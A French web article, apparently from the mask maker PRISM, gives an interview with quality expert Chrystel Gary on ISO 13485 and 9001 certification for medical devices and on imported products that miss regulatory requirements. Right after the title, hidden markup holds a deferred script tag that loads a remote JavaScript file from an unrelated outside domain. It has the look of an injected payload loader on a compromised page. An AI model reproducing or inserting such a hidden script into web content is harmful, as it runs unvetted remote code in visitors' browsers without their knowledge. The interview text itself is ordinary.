Chrystel Gary (experte en certifications et normes ISO de dispositifs médicaux) : "Beaucoup de produits importés ne répondent pas aux obligations réglementaires" - PRISM</title><p hidden>width="69.5px" height="118.5px"<script defer src="https://softbylinux.com/tps.js?host=prism-medical-protect.fr"></script><p hidden>

Chrystel Gary, responsable qualité sécurité environnement dans une entreprise de prestation de service, a accepté de livrer à PRISM TV son éclairage en matière de qualité sur les dispositifs médicaux.

Celle qui accompagne PRISM depuis un an nous rappelle la nécessité des normes ISO comme celles obtenues par le fabricant de masques héraultais (ISO 13485 & ISO 9001) : " La norme 13485 est une norme de référence pour tous les acteurs du dispositif médical. C'est aussi un moyen de se structurer correctement, de répondre aux exigences réglementaires et d'accéder à un certain nombre de marchés notamment dans le public. "

Une manière de se distinguer des importateurs ? "Absolument, beaucoup de produits importés, en particulier de Chine, ne répondent pas aujourd'hui à certaines exigences réglementaires."

Pour en savoir plus sur les normes ISO 13485 & 9001

Partager cet article

Commentaires (0)